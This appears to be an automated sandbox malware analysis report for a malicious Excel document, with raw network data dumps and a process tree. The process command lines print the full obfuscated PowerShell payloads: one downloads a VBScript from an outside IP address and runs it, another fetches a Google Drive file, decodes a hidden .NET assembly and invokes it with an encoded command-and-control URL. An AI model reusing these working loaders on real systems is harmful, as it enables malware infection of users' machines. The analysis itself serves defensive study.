                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68
                                                                                                    Data Ascii: *~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xh
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d
                                                                                                    Data Ascii: f4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96
                                                                                                    Data Ascii: 9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28
                                                                                                    Data Ascii: ['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37
                                                                                                    Data Ascii: Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef
                                                                                                    Data Ascii: xh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`A
                                                                                                    2024-10-29 09:13:08 UTC1378INData Raw: 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab 10 1b 49 ef 79
                                                                                                    Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-TtIy


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:05:12:05
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                    Imagebase:0x13fe70000
                                                                                                    File size:28'253'536 bytes
                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:05:12:29
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                    Imagebase:0x13f070000
                                                                                                    File size:13'824 bytes
                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:05:12:33
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:05:12:36
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:05:12:38
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"
                                                                                                    Imagebase:0x13ff80000
                                                                                                    File size:2'758'280 bytes
                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:05:12:38
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE550.tmp" "c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP"
                                                                                                    Imagebase:0x13f730000
                                                                                                    File size:52'744 bytes
                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:05:12:43
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
                                                                                                    Imagebase:0xff470000
                                                                                                    File size:168'960 bytes
                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:05:12:44
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:14
                                                                                                    Start time:05:12:45
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:05:12:48
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                    Imagebase:0x13f880000
                                                                                                    File size:13'824 bytes
                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:05:12:52
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
